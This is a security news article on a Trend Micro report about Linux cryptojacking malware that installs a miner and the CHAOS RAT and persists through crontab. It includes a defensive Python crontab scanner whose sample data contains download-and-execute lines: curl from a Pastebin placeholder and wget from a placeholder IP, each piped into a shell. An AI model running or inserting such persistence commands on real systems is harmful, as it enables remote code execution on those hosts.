- Trend Micro intercepted a threat with a slightly different infection routine that incorporates an advanced remote access trojan (RAT).
- The malware achieves persistence by altering /etc/crontab, the system table of the UNIX task scheduler cron, so that it re-downloads itself from Pastebin every 10 minutes.
- It also downloads an XMRig miner, the miner's configuration file, a looping "competition killer" shell script and, most importantly, the RAT itself.
Trend Micro announced that in November its team discovered a threat that uses a different infection routine and incorporates an advanced remote access trojan, CHAOS Remote Administrative Tool, which is based on an open-source project. The malware is capable of terminating competing malware and killing processes that consume resources and degrade cryptocurrency mining performance.
Cryptojacking
To achieve persistence, the malware alters the /etc/crontab file, the system table of the UNIX task scheduler cron, so that it re-downloads itself from Pastebin every 10 minutes. It also downloads further payloads: an XMRig miner, the miner's configuration file, a looping "competition killer" shell script and the RAT. The payloads and the main downloader script are hosted in different locations. According to Trend Micro, the script shows that the main server used to download payloads is located in Russia, and historical WHOIS data shows that the host is also used for cloud bulletproof hosting.
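The persistence mechanism above leaves a recognisable trace: a system crontab entry that runs at a short interval, fetches a script from a remote host (here a paste site) and pipes it straight into a shell. The following checker, an added example that is not part of Trend Micro's report or of the malware itself, scans /etc/crontab-style text for exactly that combination. The crontab lines embedded in it are constructed sample data, not indicators from the original campaign; the paste-site list, the interval threshold and the regular expressions are assumptions chosen for illustration.

```python
"""Hunt system crontab entries for short-interval download-and-execute persistence.

A line is flagged when its command either pulls from a known paste site or
fetches a remote URL and feeds the result to a shell. A short re-run interval
is reported as an extra reason but is never a finding on its own, so ordinary
frequent jobs (health checks, run-parts) stay quiet.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample /etc/crontab (system format: five schedule fields, user, command).
# The URLs and addresses below are placeholders, not real indicators.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/10 * * * *   root    curl -fsSL https://pastebin.com/raw/EXAMPLE | sh
*/10 * * * *   root    wget -q -O- http://203.0.113.10/x.sh | bash
0 3 * * *      root    /usr/bin/certbot renew --quiet
*/5 * * * *    root    /usr/local/bin/healthcheck.sh
"""

# Assumed heuristics: common download tools, a small paste-site list, any URL,
# and the usual ways of handing downloaded text to a shell.
FETCHERS = re.compile(r"\b(curl|wget|fetch|python[23]?\s+-c)\b")
PASTE_HOSTS = re.compile(r"\b(pastebin\.com|paste\.ee|hastebin\.com)\b", re.I)
REMOTE_URL = re.compile(r"https?://\S+")
SHELL_SINK = re.compile(r"\|\s*(ba|z|da)?sh\b|\b(ba|z)?sh\s+-c\b|\bbash\s*<\s*\(")


@dataclass
class Finding:
    line_no: int
    interval_minutes: Optional[int]
    reasons: List[str]
    command: str


def minute_interval(minute_field: str, hour_field: str) -> Optional[int]:
    """Smallest re-run interval in minutes for the common schedule shapes.

    '*' -> every minute, '*/N' -> every N minutes, a fixed minute with hour '*'
    -> hourly; anything slower or more exotic returns None (not short-interval).
    """
    if minute_field == "*":
        return 1
    step = re.fullmatch(r"\*/(\d+)", minute_field)
    if step:
        return int(step.group(1))
    if hour_field == "*":
        return 60
    return None


def scan_crontab(text: str, system: bool = True, max_interval: int = 15) -> List[Finding]:
    """Return one Finding per suspicious entry in a crontab (system=True adds the user field)."""
    findings: List[Finding] = []
    fields = 7 if system else 6
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        # Skip blanks, comments and environment assignments such as SHELL=/bin/sh.
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        parts = line.split(None, fields - 1)
        if len(parts) < fields:
            continue
        minute, hour, command = parts[0], parts[1], parts[-1]
        reasons: List[str] = []
        if PASTE_HOSTS.search(command):
            reasons.append("downloads from a paste site")
        fetches = FETCHERS.search(command) or REMOTE_URL.search(command)
        if fetches and SHELL_SINK.search(command):
            reasons.append("pipes downloaded content into a shell")
        interval = minute_interval(minute, hour)
        if reasons and interval is not None and interval <= max_interval:
            reasons.append(f"re-runs every {interval} minute(s)")
        if reasons:
            findings.append(Finding(n, interval, reasons, command))
    return findings


if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: {', '.join(f.reasons)}\n    {f.command}")
```

On a real host, pass `open("/etc/crontab").read()` to `scan_crontab`, and the files under /etc/cron.d in the same system format; per-user crontabs from /var/spool/cron have no user field and need `system=False`. The checker only reads the schedule and command text, so a downloader that hides behind a local wrapper script will not be caught; pair it with a look at what those scripts contain.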
The Russian server only provides payloads; for command and control, the CHAOS RAT connects to a separate server that IP geolocation places in Hong Kong. The RAT client connects to the C&C server by its address and default port and authenticates with a JSON Web Token. Once authorization succeeds, it sends detailed information about the infected machine to the server through the /device endpoint. The RAT is a Go-compiled binary with the following functions:
- Perform reverse shell
- Download files
- Upload files
- Delete files
- Take screenshots
- Access file explorer
- Gather operating system information
- Restart the PC
- Shutdown the PC
- Open a URL
Trend Micro said,
« On the surface, the incorporation of a RAT into the infection routine of a cryptocurrency mining malware might seem relatively minor. However, given the tool’s array of functions and the fact that this evolution shows that cloud-based threat actors are still evolving their campaigns, it is important that both organizations and individuals stay extra vigilant when it comes to security. In our research on cloud-based cryptocurrency mining groups, we provided several concrete measures and best practices that enterprises can implement to help strengthen their defensive posture. »